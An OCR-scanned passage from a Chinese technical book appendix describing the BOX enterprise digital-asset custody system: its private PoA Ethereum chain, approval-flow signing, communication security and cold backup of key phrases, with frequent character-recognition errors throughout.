由 于 签名 机 一 旦 停机 ， 内 存 中 的 私 铀 会 立即 消失 ， 所 以 当 签 名 机 需要 重启 时 ， 需 要 所 有 私 铀 App 重 新 输入 正确 的 关键 句 。 如 果 某 个 私 钥 App 持 有 人 无 法 输入 正确 的 关键 句 ， 此 时 需要 启用 私 钥 关 键 句 
的 冷 备份 。 由 于 此 流程 属于 实际 企业 管理 流程 ， 本 书 仅 给 出 冷 备份 的 建议 方案 ,具体 参见 C.7 节 。 


C.3” 私 链 


(1) 私 链 的 作用 与 优势 


私 链 在 整个 BOX 系 统 中 起 到 存 证 和 验 真 的 作用 。 利 用 区 块 链 不 可 算 改 的 特性 ， 可 将 审批 流程 和 转账 审批 流程 上 链 保 存 ， 为 程序 实现 转账 自动 化 提供 可 靠 依据 。BOX 系 统 首次 发 行 版 本 采用 以 太 坊 搭建 
私 链 ， 未 来 计划 支持 更 多 的 搭建 私 链 的 方案 。 


在 企业 内 部 部 署 一 套 私 链 ， 企 业 不 仅 获 得 一 套 存 证 和 验 真 的 系统 ， 而 且 可 以 独立 自主 控制 其 全 部 节点 。 通 过 设置 节点 参数 ， 可 以 控制 每 个 区 块 最 大 可 打包 交易 数量 、 出 块 时 间 间 隔 和 人 参与 节点 的 数 
量 。 这 些 参数 决定 了 单位 出 块 时 间 窗 口内 ， 可 以 接受 的 交易 笔 数 ， 即 审批 流转 处 理 的 吞吐 量 。 


由 于 是 私 链 ， 使 得 Gas 消 耗 可 以 忽略 不 计 ， 同 时 对 上 层 应 用 弱化 gasPrice 的 消耗 ， 使 得 在 区 块 链 上 驱使 合约 的 代价 降低 。 
私 链 采 用 PoA (Proof of Authority) 共识 机 制 ， 直 接 指定 哪些 私 链 节点 拥有 记 账 权限 ， 没 有 记 账 权限 的 节点 将 作为 备份 节点 存在 。 
(2) 伴生 程序 


以 太 坊 DApp 每 个 私 链 节 点 都 会 配备 同一 个 伴生 程序 ， 用 于 实现 处 理 传统 的 CS (客户 端 -服务 器 ) 应 用 程序 请 求 、 处 理 数据 上 传 私 链 、 执 行 智能 合约 、 监 听 智 能 合约 事件 、 发 送 状态 通知 、 协 调 上 层 应 
用 和 授权 服务 之 间 的 交互 等 功能 ， 如 图 C-3 所 示 。 
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图 C-3 伴生 程序 
伴生 程序 之 间 是 对 等 的 ， 且 只 与 处 于 同一 台 服务 器 上 的 私 链 节点 通信 。 伴 生 程序 之 间 没有 直接 的 网 络 连 通 。 每 个 伴生 程序 都 会 对 应 一 个 私 链 的 账户 ， 该 账户 用 以 执行 智能 合约 的 方法 。 


伴生 程序 协调 接 入 层 与 授权 层 之 间 的 交互 。 发 生 一 笔 转账 交易 要 经 过 以 下 4 个 过 程 : 发 起 交易 一 服务 受理 一 交易 成 功 一 通知 结果 。 我 们 将 这 4 个 过 程 划 分 为 4 个 象限 ， 如 图 C-4 所 示 。 伴 生 程序 处 于 私 链 
层 这 一 象限 维度 ， 通 过 将 数据 上 链 实现 对 现实 中 的 转账 交易 进行 存 证 和 验 真 ， 同 时 将 成 功 的 结果 通知 到 签名 机 ， 由 签名 机 根据 最 终结 果 操 作 公 链 资金 账户 。 伴 生 程 序 隔离 了 交易 发 起 者 与 公 链 资金 账户 之 
间 的 直接 关联 ， 整 个 过 程 由 程序 根据 审批 流 自动 执行 。 


(3) 智能 合约 的 共识 机 制 
上 链 存 证 的 数据 存放 在 智能 合约 内 。 智 能 合约 采取 投票 的 方式 来 确认 一 笔 上 链 存 证 的 数据 ， 每 一 笔 数 据 都 必须 通过 51% 的 私 链 节 点 投票 ， 且 每 次 投票 的 内 容 一 致 才 被 确认 为 有 效 存 证 。 每 个 节点 分 别 
对 应 一 个 操作 同一 合约 的 账户 ， 除 非 超 过 50% 的 节点 被 全 部 攻陷 ， 否 则 上 链 存 证 的 数据 是 可 以 被 保证 有 效 的 。 
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图 C-4 一 笔 转账 交易 四 象限 


智能 合约 投票 系统 需要 分 配合 理 的 权限 给 正确 的 账户 。 所 有 私 链 账户 在 私 链 搭建 完成 后 即 被 确定 下 来 。 当 需要 增加 私 链 节点 时 ， 必 须 由 所 有 私 链 账户 授权 新 账号 ， 系 统 将 自动 重新 平衡 51% 策 略 ， 无 
须 重新 部 署 新 合约 来 适应 其 变化 。 


存 证 数据 分 为 审核 流程 和 转账 申请 (流程) 。 如 图 C-5 所 示 ， 在 提现 之 前 ， 需 要 设置 审核 流程 (审核 流程 用 于 确定 企业 内 部 在 使 用 数字 货币 时 需要 参与 审核 的 部 门 ， 参 与 审核 的 部 门 需要 多 少 人 确 
认 ) ; 审核 流程 需要 由 掌握 企业 管理 最 高 权限 的 所 有 私 铀 App 来 授权 ; 授权 过 后 的 审核 流程 可 以 用 来 发 起 转账 申请 。 
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图 C-5 ”审核 流程 和 转账 申请 


C4 接 入 层 


接 入 层 采 用 权利 离散 式 的 构架 方式 。 

整个 系统 的 权利 被 离散 在 各 个 App 端 ， 接 入 层 服 务 器 虽然 承担 了 各 种 业务 的 起 承 转 合 ， 但 是 却 对 信息 所 行使 的 权利 无 法 修改 和 执行 。 

权利 离散 式 的 实现 ， 依 赖 于 基础 算法 ECDSA。 算 法 中 ECC (Elliptic Curve Cryptography) 则 采用 比特 币 经 典 曲线 secp256k1。 

转账 过 程 为 : 由 员工 App 和 管理 App 产 生 签名 ， 然 后 在 接 入 层 完 成 转移 ， 并 在 私 链 层 得 到 确认 ， 最 后 签名 机 在 公 链 上 实施 。 

接 入 层 业务 分 为 两 大 部 分 : 审批 流 的 构建 和 修改 ， 审 批 流 的 执行 。 

(1) 审批 流 的 构建 和 修改 

在 执行 转账 前 需要 先 构建 企业 转账 审批 流 。 该 审批 流 为 多 级 审核 模型 ， 最 底层 为 员工 管理 组 ， 其 上 可 以 有 多 级 审核 ， 每 级 审核 可 以 有 多 个 审核 人 ， 需 要 指定 最 小 审核 人 数 。 


举例 说 明 ， 企 业 审批 流 如 图 C-6 所 示 。 


员工 管理 组 1l/n 





图 C-6 企业 审批 流 
当 企业 确认 了 审批 流 ， 则 可 以 通过 管理 App 录 入 系统 ， 构 建成 系统 可 识别 的 协议 格式 。 该 协议 格式 在 BOX 系 统 中 被 命名 为 boxflow。 


boxflow 建 立 完成 后 为 未 授权 状态 ， 如 果 需 要 授权 ， 则 转交 给 接 入 层 。 接 入 层 检 查 格式 并 哈 希 上 私 链 ， 由 私 链 所 有 节点 投票 存 证 ， 存 证 后 通知 签名 机 。 由 私 钥 App 授 权 签 名 机 将 审批 流 哈 希 写 入 公 链 ， 


公 链 确认 后 ， 将 私 链 上 审批 流 的 哈 希 状态 设置 为 有 效 ， 则 boxflow 授 权 成 功 (关于 私 铀 App 的 安全 性 及 重要 性 ， 参 见 第 7 章 ) ， 企 业 可 以 通过 该 boxflow 进 行 转账 。 
boxflow 的 修改 流程 需要 私 钥 App 先 取消 当前 boxflow 的 授权 ， 青 重新 建 六 boxflow。 
(2) 审批 流 的 执行 
当 boxflow 授 权 成 功 后 ， 需 要 先 建立 员工 账号 ， 才 能 进行 基于 该 boxflow 的 审批 流转 账 。 
在 BOX 系 统 里 员工 账号 由 员工 管理 组 分 配 公 私 钥 。 当 boxflow 授 权 成 功 后 ， 员 工 App 将 得 到 当前 boxflow。 员 工 向 员工 管理 组 申请 私 钥 ， 员 工 管理 组 衍生 出 子 私 钥 ， 分 配给 该 申请 员工 App。 


员工 App 获 取 私 钥 后 ， 可 以 友 起 转账 申请 。 申 请 格式 如 下 : 


{ balance: 100E18, 
timestamp: 1512719484736, 
destination: 'O0x6E9483f00cCd685c5F12709Fd542DalFRB20c4d2e', 



































currency: ‘ETH', 
applicant 
{ username: 'bluce'} } 


此 时 生成 的 申请 为 未 签名 状态 ， 需 要 将 该 申请 使 用 SHA-256 算 法 进行 哈 希 ， 并 将 哈 希 签名 放 入 申请 中 。 格 式 如 下 : 


{ balance: 100E18, 
timestamp: 1512719484736, 
destination: 'O0x6E9483f00cCd685c5F12709Fd542DalFRB20c4d2e', 
miner: El6, 
currency: ‘ETH', 
applicant: 
{ username: 'bluce', 
sign: '474w3zgKRLwaddG6LadzKQ3ut1JyQUc4HPpVLkydR6xdk2TwS7zEXKf4ESAyGHxOQOK 
fLYxJsccxhqdY5QOm5352P2H4"' } } 





















































该 员工 的 申请 ， 只 能 由 其 对 应 的 员工 管理 组 账号 审核 。 


员工 管理 组 审核 通过 后 ， 对 申请 (包括 签名 ) 进行 哈 希 并 签名 。 签 名 完成 后 交 给 上 级 审核 人 进行 审核 ， 上 级 审核 人 对 下 级 签名 信息 验证 后 ， 对 哈 希 进行 签名 。 以 此 类 推 ， 直 至 最 上 层 审 核 人 签名 完 


最 后 生成 的 转账 审核 流 视 为 一 次 记 账 ， 称 之 为 transbox。 
该 transbox 哈 希 后 ， 得 到 该 次 交易 的 交易 ID。 当 接 入 层 收 到 transbox 并 校 验 其 匹配 对 应 的 boxflow 后 ， 将 交易 ID ( 哈 希 ) 上 私 链 存 证 。 私 链 通过 投票 确认 交易 ID 后 ， 通 知 签名 机 进行 验证 和 签名 。 


签名 机 收 到 原始 信息 后 ， 从 transbox 中 提取 boxflow 并 在 账户 里 验证 是 否 合法 ， 然 后 依次 检验 签名 是 否 完整 ， 验 证 通过 后 说 明 为 合法 transbox， 进 行 公 链 转 账 ， 并 将 公 链 交易 ID 上 私 链 存 证 。 接 入 层 
可 以 根据 交易 ID 在 公 链 上 实时 查询 结果 


(3) 多 审批 流 的 支持 


在 第 一 个 公开 发 行 版 本 中 ，BOX 仅 支持 单一 审批 流 ; 在 后 续 升 级 版 本 中 ， 将 支持 多 审批 流 。 


C.5 审批 流 安 全 机 制 
自动 化 转账 的 安全 涉及 两 个 方面 ， 其 一 是 私 钥 本 身 的 安全 (已 在 私 钥 安全 性 章节 中 前 述 ) ， 其 二 是 使 用 权 (审批 流 ) 的 安全 。 下 面 将 对 审批 流 的 安全 展开 阐述 
(1) 审批 流 的 有 效 性 


一 个 合法 的 审批 法 需要 经 过 私 链 存 证 、 私 铀 App 授 权 和 公 链 确认 。 由 于 私 铀 App 是 由 N 位 企业 管理 人 员 掌 控 ， 因 此 审批 流 是 否 有 效 是 由 N 位 企业 管理 人 员 共 同 确认 ， 并 且 写 进 公 链 、 私 链 。 该 审批 法 有 
效 性 无 法 纂 改 。 


(2) 转账 的 生成 

转账 由 员工 App 发 起 并 签名 ， 经 过 员工 管理 组 及 各 层 审核 人 员 依 次 验证 无 误 后 签名 ,转账 即 生成 。 因 为 公私 钥 只 有 App 上 存在 ,其 他 任何 人 在 传输 的 过 程 中 都 无 法 算 改 转账 信息 。 

(3) 转账 的 有 效 性 

转账 的 有 效 性 分 为 两 个 部 分 ， 其 一 是 本 身 签名 的 有 效 性 ， 其 二 是 其 对 应 的 审批 流 的 有 效 性 。 由 于 BOX 采 用 的 是 嵌 套 签名 的 方法 ， 因 此 只 需要 按照 顺序 依次 验证 签名 ， 即 可 知道 签名 本 身 是 否 有 效 。 转 
账本 身 对 应 一 个 审批 流 ， 需 要 提取 对 应 的 审批 流 ， 并 在 账户 中 验证 该 审批 流 是 否 有 效 。 如 果 两 个 条 件 均 满足 ， 证 明 该 次 转账 是 由 有 效 审批 流 指 定 的 App 确 认 的 ， 并 且 是 无 法 算 改 的 。 


C.6 ”通信 安全 机 制 


(1) 签名 机 与 私 链 的 通信 


签名 机 即 授权 层 中 的 服务 所 在 的 服务 器 。 签 名 机 与 私 链 的 通信 即 授权 层 的 服务 与 私 链 层 服务 之 间 的 通信 。 服 务 与 服务 之 间 的 通信 使 用 gRPC+SSL/TLS 双 向 证 书 认证 。gRPC 是 一 个 高 性 能 RPC 框 架 ， 遵 
循 HTTP/2 协 议 标准 设计 ， 基 于 ProtoBuf (Protocol Buffers) 序列 化 协议 开发 。HTTP/2 协 议 标 准 本 身 便 要 求 对 数据 进行 加 密 传输 (SSL/TLS) 。BOX 系 统 将 针对 所 有 公 链 开发 授权 服务 模块 。 由 于 
SSL/TLS 双 向 认证 证 书 的 存在 ,将 极 大 程度 保证 信息 安全 ， 服 务 器 之 间 一 旦 有 异常 连接 就 会 立即 拒绝 请 求 ， 大 大 降低 了 中 间 人 攻击 的 风险 。 


(2) 员工 App 与 接 入 层 的 通信 

所 有 与 接 入 层 通信 的 App， 都 采用 HTTPSs 的 方式 。 员 工 签 名 用 的 私 钥 是 通过 管理 App 颁 友 的 。 处 理 步 骤 如 下 ( 见 图 C-7) 。 
@ 管 理 App 生 成 员工 私 铀 ， 并 生成 对 称 加 密 用 的 随机 数 密 

@ 管 理 App 用 密码 以 对 称 加 密 的 方式 将 员工 私 钥 加 密 。 

@ 管 理 App 通 过 线 下 方式 将 密码 告知 员工 。 


@ 管 理 App 将 加 密 后 的 员工 私 钥 发 送 给 接 入 层 暂 


@ 员 工 App 从 接 入 层 下 载 加 密 数据 并 用 给 定 密码 解密 。 








解 壬 公 线 下 提供 解密 密码 


生成 加 密 用 随机 数 密码 ， 
生成 员工 公私 铀 ， 用 密码 
加 密 公 私 铀 






发 送 加 蜜 后 生成 
的 员工 公私 负 


临时 保存 员工 
公私 针 
图 C-7 通信 处 理 步 又 
(3) 接 入 层 与 私 链 节 点 的 通信 


接 入 层 与 私 链 之 间 属 于 内 部 通信 ， 采 用 TCP/IP 协 议 连 接 。 此 时 接 入 层 传递 到 私 链 的 数据 已 经 经 过 了 签名 授权 ， 并 产生 了 信息 摘要 ， 私 链 只 需要 使 用 签名 校 验 程序 对 其 验 真 ， 如 果 校 验 失败 ， 则 拒绝 服 
务 。 接 入 层 向 所 有 私 链 节点 发 送 请 求 。 每 个 私 链 节点 对 应 一 个 账号 ， 每 个 账号 将 验证 后 的 请 求 数据 以 投票 机 制 上 链 存 证 。 当 私 链 上 的 智能 合约 被 超过 50% 账 号 确认 之 后 ， 数 据 上 链 成 功 。 接 入 层 提供 签名 
和 摘要 供 私 链 确认 ， 私 链 通过 投票 向 接 入 层 提 供 投票 结果 。 以 上 过 程 可 以 归纳 为 两 个 公式 : 





signature = sign (hash) 
public key == recover (hash, signature) 








C.7 ” 私 钥 的 冷 备份 


为 了 防止 某 个 私 钥 App 持 有 人 出 现 意外 情况 导致 私 钥 无 法 重 置 ， 我 们 建议 将 所 有 关键 词 进行 物理 备份 。 例 如 ， 在 每 个 私 钥 App 持 有 人 输入 关键 词 后 ， 可 将 运行 私 钥 App 的 手机 连接 到 一 台 不 联网 的 迷 
尔 型 打印 机 ， 采 用 打印 的 方式 将 该 天 键 词 以 二 维 码 的 形式 打印 到 纸 条 上 ， 并 且 打 印 两 份 。 所 有 关键 词 纸 条 将 被 分 为 两 份 ， 封 存在 两 个 信封 内 。 建 议 企 业 将 此 迷你 打印 机 与 两 份 关键 词 备份 件 分 别 存 放 于 两 
家 银行 保险 箱 中 ， 保 险 箱 的 其 中 一 把 钥匙 可 以 委托 给 企业 律师 持 有 ， 并 约定 仅 允 许 在 企业 董事 会 决议 同意 后 才 可 以 启封 此 备份 。 


